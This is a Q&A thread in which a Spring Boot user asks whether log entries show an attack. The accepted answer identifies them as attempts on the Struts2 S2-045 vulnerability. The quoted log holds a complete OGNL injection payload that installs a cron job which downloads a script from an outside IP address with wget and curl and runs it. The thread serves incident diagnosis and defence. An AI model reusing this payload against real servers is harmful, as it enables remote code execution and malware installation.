# InvalidMediaTypeException - Am I under attack?

Tags: java, spring, spring-boot, struts2

For the past few weeks, we've been seeing a lot of this in our logs. This is a spring-boot application. Is this an RCE attempt? Is this related to https://cwiki.apache.org/confluence/display/WW/S2-045?

```
Caused by: org.springframework.http.InvalidMediaTypeException: Invalid mime type "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/13 * * * * wget -O - -q http://91.230.47.41/res/logo.jpg|sh\n*/14 * * * * curl http://91.230.47.41/res/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}": Invalid token character '{' in token "%{(#_='multipart"
    at org.springframework.http.MediaType.parseMediaType(MediaType.java:385) ~[spring-web-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.http.HttpHeaders.getContentType(HttpHeaders.java:722) ~[spring-web-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.http.server.ServletServerHttpRequest.getHeaders(ServletServerHttpRequest.java:116) ~[spring-web-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.mvc.method.annotation.HttpEntityMethodProcessor.isResourceNotModified(HttpEntityMethodProcessor.java:190) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.mvc.method.annotation.HttpEntityMethodProcessor.handleReturnValue(HttpEntityMethodProcessor.java:173) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.method.support.HandlerMethodReturnValueHandlerComposite.handleReturnValue(HandlerMethodReturnValueHandlerComposite.java:81) ~[spring-web-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:126) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:832) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:743) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:961) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:895) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:967) ~[spring-webmvc-4.2.6.RELEASE.jar:4.2.6.RELEASE]
    ... 24 more
```

Comment: Without seeing the precise input, it's difficult to say.

Comment: There's nothing else to share honestly - what do you mean by input here?

Comment: Yes, it is related. If you're using latest S2 or don't use S2 at all then you're safe.

Comment: We don't use S2, but at least once, I was able to see a random image on one of the pages. This seems to hurt somehow even in the absence of S2.

Comment: Just wanted to add I'm seeing this in my production logs as well, I don't use struts 2, is there a way to catch this before it hits the spring-boot app?

Comment: @user1432403 I'm looking around for the same thing exactly, didn't find a way yet

Answer (score 3, accepted):

Yes, that does look like an attempt to exploit [CVE-2017-5638](https://nvd.nist.gov/vuln/detail/CVE-2017-5638), which is described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) that you linked to.

The exception in your Spring Boot application shows that it is not vulnerable to the attack (if it was vulnerable, you wouldn't have the exception), but that won't stop people from trying and your logs from filling with noise.

Unfortunately, I have not yet found a way to keep the noise from these exceptions out of the logs, but, at least for now, they are just noise and you don't need to worry about them.

Comment: Sorry, I know this is an old question, but I couldn't find any other information about this topic. Do you know if there is a way to catch this exception yet? ControllerAdvice/ExceptionHandler doesn't seem to get the job done.

Comment: @Foreign Sorry, I don't have any further information.